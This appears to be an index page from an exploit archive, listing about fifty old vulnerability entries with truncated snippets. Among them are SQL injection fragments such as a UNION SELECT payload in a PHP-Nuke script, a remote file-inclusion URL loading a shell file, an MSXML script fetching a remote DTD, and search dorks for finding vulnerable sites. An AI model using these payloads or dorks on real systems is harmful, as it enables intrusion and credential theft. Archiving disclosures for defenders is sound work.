Total Video Player - vcen.dll Remote Off-by-One Crash

Total Video Player - vcen.dll Remote Off-by-One Crash Total Video Player vcen.dll Remote Heap Overflow Crash By Cn4phux. Vendor: http://www.effectmatrix.com/ Risk : high The "" tag fail to handle long strings, which can lead to a Heap overflow in TVP. This bug can be remote or local, TVP parse an...

Microsoft XML Core Services DTD - Cross-Domain Scripting (MS08-069)

Microsoft XML Core Services DTD - Cross-Domain Scripting MS08-069 KB955218 - CVE-2008-4029 - JA var dom = new ActiveXObject"Msxml2.DOMDocument.3.0"; dom.async = false; var url = "http://www.milw0rm.com/forfun.dtd"; var xml = ""; if dom.loadXMLxml == 0 alert"Blue or Red Pill? " +...

PHP-Fusion Mod recept - kat_id SQL Injection

PHP-Fusion Mod recept - katid SQL Injection PHP-Fusion Mod recept katid Remote SQL Injection Vulnerability ++++++++++++++++++++++++++++ Author : boom3rang webpage : www.khg-crew.ws greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er - -=Kosova Hackers Group-= ++++++++++++++++++++++++++++ + Dork:...

ICONICS Vessel Gauge Switch 8.02.140 - ActiveX Buffer Overflow (Metasploit)

ICONICS Vessel Gauge Switch 8.02.140 - ActiveX Buffer Overflow Metasploit $Id: iconicsdlgwrapper.rb 1 2008-09-21 22:43:00Z kf $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more...

e-vision CMS 2.02 - SQL Injection Arbitrary File Upload Information Gathering

e-vision CMS 2.02 - SQL Injection Arbitrary File Upload Information Gathering eVision 2.0 Sql Injection/Remote File Upload/IG AUTHOR : IRCRASH R3d.W0rm Sina Yazdanmehr Discovered by : IRCRASH R3d.W0rm Sina Yazdanmehr Our Site : Http://IRCRASH.COM IRCRASH Team Members : Dr.Crash - R3d.w0rm Sina...

Joomla! Component jabode - id SQL Injection

Joomla! Component jabode - id SQL Injection /---------------------------------------------------------------\ \ / / Joomla Component jabode Remote SQL injection \ \ / ---------------------------------------------------------------/ Author : His0k4 ALGERIAN HaCkEr Dork : inurl:comjabode POC :...

PHP 5.2.6 - chdir() Function http URL Argument Safe_mode Restriction Bypass

PHP 5.2.6 - chdir Function http URL Argument Safemode Restriction Bypass source: https://www.securityfocus.com/bid/29796/info PHP is prone to multiple 'safemode' restriction-bypass vulnerabilities. Successful exploits could allow an attacker to determine the presence of files in unauthorized...

NASA Ames Research Center BigView 1.8 - .PNM Stack Buffer Overflow (PoC)

NASA Ames Research Center BigView 1.8 - .PNM Stack Buffer Overflow PoC source: https://www.securityfocus.com/bid/29517/info NASA Ames Research Center BigView is prone to a remote stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying ...

CMS WebManager-Pro - Multiple SQL Injections

CMS WebManager-Pro - Multiple SQL Injections :::::::-. ... ::::::. :::. ;;, ';, ;; ;;;;;;;, ;;; ' . ' $$, $$$$ $$$ $$$ "Y$c$$ 888,o8P'88 .d888 888 Y88 MMMMP" "YmmMMMM"" MMM YM Discovered by dun \ dunatstrcpy.eu CMS Webmanager-pro Remote SQL Injection Vulnerability Script site:...

GameCMS Lite 1.0 - systemId SQL Injection

GameCMS Lite 1.0 - systemId SQL Injection w w w || || | || o,7 || . o7 || 4||| ow, : / / . |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| | | | /' \ /'\ /\ \ /'\ /\ \ | | /, \ /\/\L\ \ \ \ ,/\ /\ \ \ \ / | | //\ \ /' \ /\ //\ Kings of injection | | // | |...

MyBB Plugin Custom Pages 1.0 - SQL Injection

MyBB Plugin Custom Pages 1.0 - SQL Injection MyBulletin Board MyBB Plugin "Custom Pages 1.0" - SQL Injection Vulnerability found by: LidlosesAuge Greetz to: free-hack.com Vulnerability: Document: pages.php GET-Parameter: page Dork: inurl:"pages.php" + intext:"powered by mybb" Example:...

ZYXEL ZyWALL QuaggaZebra - Default Password Remote Code Execution

ZYXEL ZyWALL QuaggaZebra - Default Password Remote Code Execution Name: ZyXEL ZyWALL Quagga/Zebra Remote Root Vulnerability Release Date: 10 March 2008 Discover: Pranav Joshi Vendor: ZyXEL Products Affected: ZyWALL Status on other affected products & firmwares pending from vendor’s end...

Xine-Lib 1.1.11 - Multiple Heap Remote Buffer Overflow Vulnerabilities

Xine-Lib 1.1.11 - Multiple Heap Remote Buffer Overflow Vulnerabilities // source: https://www.securityfocus.com/bid/28370/info The 'xine-lib' library is prone to multiple heap-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input...

AuraCMS 2.2.1 - X-Forwarded-For HTTP Header Blind SQL Injection

AuraCMS 2.2.1 - X-Forwarded-For HTTP Header Blind SQL Injection !/usr/bin/perl -w Indonesian Newhack Security Advisory ------------------------------------ AuraCMS 2.x online.php - Remote Blind SQL Injection Exploit Waktu : Feb 15 2008 01:00PM Software : AuraCMS Versi : 2.0 2.1 2.2.1 Vendor :...

eXV2 Module eblog 1.2 - blog_id SQL Injection

eXV2 Module eblog 1.2 - blogid SQL Injection Powered by eXV2 eblog 1.2 SQL Injection AUTHOR : S@BUN HOME : http://www.milw0rm.com/author/1334 MAÄ°L : [email protected] DORKS 1 : allinurl :"modules/eblog" DORK 2 : allinurl :"exoops/modules/eblog" EXPLOIT :...

Mapbender 2.4.4 - gaz SQL Injection

Mapbender 2.4.4 - gaz SQL Injection Advisory: SQL-Injections in Mapbender During a penetration test RedTeam Pentesting discovered multiple SQL-Injections in Mapbender. A remote attacker is able to execute arbitrary SQL commands and therefore can get e.g. valid usernames and password hashes of the...

Joomla! Component Quiz 0.81 - tid SQL Injection

Joomla! Component Quiz 0.81 - tid SQL Injection joomla SQL Injectioncomquizusertstshw AUTHOR : S@BUN HOME : http://www.hackturkiye.com http://www.milw0rm.com/author/1334 MAÄ°L : [email protected] DORK 1 : allinurl: comquiz"tid" DORK 2 : allinurl: comquiz EXPLOIT : ALL PASSWORD AND...

phpBBViet 02.03.2007 - phpbb_root_path Remote File Inclusion

phpBBViet 02.03.2007 - phpbbrootpath Remote File Inclusion =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- phpBBViet 0.22 phpbbrootpath Remote File Include =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Found: xoron...

Simple Machines Forum (SMF) 1.1.3 - Blind SQL Injection

Simple Machines Forum SMF 1.1.3 - Blind SQL Injection !/usr/bin/perl Written By Michael Brooks contact: th3dotr00katgmaildotcom SMF 1.1.3 Extremely fast Blind SQL Injection Exploit! -Binary Search -Multi-Threaded -NO benchmark's Two SQL Injection flaws. Works with magicquotesgpc=On or Off. Total...

Joomla! Component Joomlaradio 5.0 - Remote File Inclusion

Joomla! Component Joomlaradio 5.0 - Remote File Inclusion Joomla Radio v5 Component RFI Bug in : administrator/components/comjoomlaradiov5/admin.joomlaradiov5.php Variable : $mosConfiglivesite Download : http://www.joomlaos.de/option,comremository/Itemid,41/func,fileinfo/id,2661.html Dork:...

PHPMytourney - menu.php Remote File Inclusion

PHPMytourney - menu.php Remote File Inclusion Title : phpMytourney functionsfile Remote File Inclusion Vulnerability Author : S.W.A.T. Contact : [email protected] S.Page : http://script.vanta.ru/download.php?id=1178&clas=0 $$ : Free Site : Http://www.XmorS-Security.CoM - Http://www.xmors.com...

xGB 2.0 - xGB.php Remote Security Bypass

xGB 2.0 - xGB.php Remote Security Bypass / xGB 2.0 xGB.php Remote Permission Bypass Vulnerability Bug discovered by DarkFuneral http://www.darkfuneral89.altervista.org/ Affected Software: xGB CMS Site: "i don't know! :P" Severity: Critical Description: An attacker can edit all message in xGB Goog...

Prozilla Pub Site Directory - Directory.php?cat SQL Injection

Prozilla Pub Site Directory - Directory.php?cat SQL Injection --==+================================================================================+==-- --==+ Prozilla Pub Site Directory SQL Injection Vulnerbility +==--...

Oracle Database - SQL Compiler Views Unauthorized Manipulation

Oracle Database - SQL Compiler Views Unauthorized Manipulation source: https://www.securityfocus.com/bid/24887/info Oracle has released a Critical Patch Update advisory for July 2007 to address multiple vulnerabilities for supported releases. Earlier unsupported releases are likely to be affected...

eDocStore - doc.php?doc_id SQL Injection

eDocStore - doc.php?docid SQL Injection --==+================================================================================+==-- --==+ eDocStore Latest Versions Local File Inclusion Vulnerbilitys +==-- --==+================================================================================+==--...

XOOPS Module Glossarie 1.7 - sid SQL Injection

XOOPS Module Glossarie 1.7 - sid SQL Injection !/usr/bin/perl Script Name: XOOPS Module Glossarie : "; $dir = ; chop $dir; if $dir = /exit/ print "-- Exploit FailedYou Are Exited \n"; exit; if $dir = /// else print "-- Exploit FailedNo DIR \n"; exit; print "User ID uid: "; $id = ; chop $id;...

aForum 1.32 - CommonAbsDir Remote File Inclusion

aForum 1.32 - CommonAbsDir Remote File Inclusion AForum =1.33 Remote file inclusion Func.php Download Script : http://www.agner.org/software/msgbrd2/aforum.zip Thanks Str0ke D0rk:allintitle:List of messageboards Exploit : http://localhost/aforumpath/common/func.php?CommonAbsDir=shell.txt?...

study planner (studiewijzer) 0.15 - Remote File Inclusion

study planner studiewijzer 0.15 - Remote File Inclusion \ /\ \ / | \ \ | / \ // / | \ | \ \ Y / | \ / / \ /| /\ / / / / / .OR.ID ECHOADV77$2007 ----------------------------------------------------------------------------------------- ECHOADV77$2007 Study planner Studiewijzer = 0.15 Remote...

FiSH-irssi - Multiple Remote Buffer Overflow Vulnerabilities

FiSH-irssi - Multiple Remote Buffer Overflow Vulnerabilities source: https://www.securityfocus.com/bid/22880/info FiSH is prone to multiple remote buffer-overflow vulnerabilities because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer...

NukeSentinel 2.5.05 - nsbypass.php Blind SQL Injection

NukeSentinel 2.5.05 - nsbypass.php Blind SQL Injection !/usr/bin/php URL: http://www.acid-root.new.fr/ ------------------------------------------------------------------ Usage: $argv0 -url -victim Opts Options: -isadmin Is the victim an Admin 1 or a normal user default=0 ? -prefix Table prefix...

PHPBB2 MODificat 0.2.0 - functions.php Remote File Inclusion

PHPBB2 MODificat 0.2.0 - functions.php Remote File Inclusion ----------------------------------------------- phpBB2 MODificat phpbbrootpath Remote File Include Exploit ----------------------------------------------- Author: xoron xoron.biz ----------------------------------------------- Code:...

Opera 9.10 - .jpg Image DHT Marker Heap Corruption

Opera 9.10 - .jpg Image DHT Marker Heap Corruption Opera JPEG processing - Heap corruption vulnerabilities ======================================================= Date..: 8th September 2006 31th October 2006 update 3rd November 2006 update 5th January 2007 public release...

HP Tru64 4.05.1 - POSIX Threads Library Privilege Escalation

HP Tru64 4.05.1 - POSIX Threads Library Privilege Escalation source: https://www.securityfocus.com/bid/21035/info HP Tru64 is prone to a local privilege-escalation vulnerability. Exploiting this issue allows local attackers to execute arbitrary code with superuser privileges. Successful exploits...

PHP-Nuke 7.9 - Encyclopedia SQL Injection

PHP-Nuke 7.9 - Encyclopedia SQL Injection ? / Neo Security Team - Exploit made by Paisterist on 2006-10-22 http://www.neosecurityteam.net / $host="localhost"; $path="/phpnuke/"; $prefix="nuke"; $port="80"; $fp = fsockopen$host, $port, $errno, $errstr, 30; $data="query=fooaa&eid=foo'//UNION SELECT...

Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (1)

Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation 1 source: https://www.securityfocus.com/bid/20471/info The Netscape Portable Runtime API running on Sun Solaris 10 operating system is prone to a local privilege-escalation vulnerability. A successful exploit of this iss...

PPA Gallery 1.0 - functions.inc.php Remote File Inclusion

PPA Gallery 1.0 - functions.inc.php Remote File Inclusion ?php / ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+: +:+:+: :+:+:+ +:...

OpenSSL SSLv2 - Null Pointer Dereference Client Denial of Service

OpenSSL SSLv2 - Null Pointer Dereference Client Denial of Service source: https://www.securityfocus.com/bid/20246/info OpenSSL is prone to a denial-of-service vulnerability. A malicious server could cause a vulnerable client application to crash, effectively denying service. !/usr/bin/perl...

Blojsom 2.31 - Cross-Site Scripting

Blojsom 2.31 - Cross-Site Scripting source: https://www.securityfocus.com/bid/20026/info Blojsom is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to have arbitrary script code execute in the browser ...

PHP Event Calendar 1.41.5 - index.php Multiple Cross-Site Scripting Vulnerabilities

PHP Event Calendar 1.41.5 - index.php Multiple Cross-Site Scripting Vulnerabilities source: https://www.securityfocus.com/bid/20001/info PHP Event Calendar is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issu...

Papoo CMS 3.2 - IBrowser Remote File Inclusion

Papoo CMS 3.2 - IBrowser Remote File Inclusion source: https://www.securityfocus.com/bid/19807/info Papoo CMS is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containin...

osCommerce 2.12.2 - product_info.php SQL Injection

osCommerce 2.12.2 - productinfo.php SQL Injection source: https://www.securityfocus.com/bid/19774/info osCommerce is prone to an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied data. A successful exploit may allow an attacker to compromise the...

Ay System CMS 2.6 - main.php Remote File Inclusion

Ay System CMS 2.6 - main.php Remote File Inclusion ============================================================================================== Ay System Solutions CMS ================================================================================================ Exploit :...

Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution

Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution // MoBB Demonstration function Demo // Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html // https://bugzilla.mozilla.org/showbug.cgi?id=342267 // CVE-2006-3677 // The Java plugin is required for this to...

Fantastic Guestbook 2.0.1 - Guestbook.php HTML Injection

Fantastic Guestbook 2.0.1 - Guestbook.php HTML Injection source: https://www.securityfocus.com/bid/18942/info Fantastic GuestBook is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content...

Matt Wright Guestbook 2.3.1 - Guestbook.pl Multiple HTML Injection Vulnerabilities

Matt Wright Guestbook 2.3.1 - Guestbook.pl Multiple HTML Injection Vulnerabilities source: https://www.securityfocus.com/bid/17438/info Guestbook is prone to multiple HTML-injection vulnerabilities; the application fails to properly sanitize user-supplied input before using it in dynamically...

RealPlayer 10.5 (6.0.12.1040-1348) - SWF Buffer Overflow (PoC)

RealPlayer 10.5 6.0.12.1040-1348 - SWF Buffer Overflow PoC !/usr/bin/perl RealPlayer: Buffer overflow vulnerability / PoC CVE-2006-0323 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323 RealNetworks Advisory http://service.real.com/realplayer/security/03162006player/en/ Federico L. Boss...

WebAlbum 2.02pl - COOKIE[skin2] Remote Code Execution

WebAlbum 2.02pl - COOKIEskin2 Remote Code Execution !/usr/bin/php -q -d shortopentag=on this works with magicquotesgpc=Off\r\n"; echo "dork: WEBalbum 2004-2006 duda\r\n"; if $argc 126 $result.=" ."; else $result.=" ".$string$i; if...

nodez 4.6.1.1 mercury - Multiple Vulnerabilities

nodez 4.6.1.1 mercury - Multiple Vulnerabilities !/usr/bin/php -q -d shortopentag=on ? echo "Nodez 4.6.1.1 Mercury possibly prior versions multiple vulnerabilities\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; / software: site:...

dotProject 2.0 - modulesprojectsgantt2.php?dPconfig[root_dir] Remote File Inclusion

dotProject 2.0 - modulesprojectsgantt2.php?dPconfigrootdir Remote File Inclusion source: https://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input...

EnterpriseGS 1.0 rc4 - Remote Command Execution

EnterpriseGS 1.0 rc4 - Remote Command Execution works against PHP5 usage: launch from Apache, fill in requested fields, then go! Sun-Tzu: "Thus the energy developed by good fighting men is as the momentum of a round stone rolled down a mountain thousands of feet in height. So much on the subject ...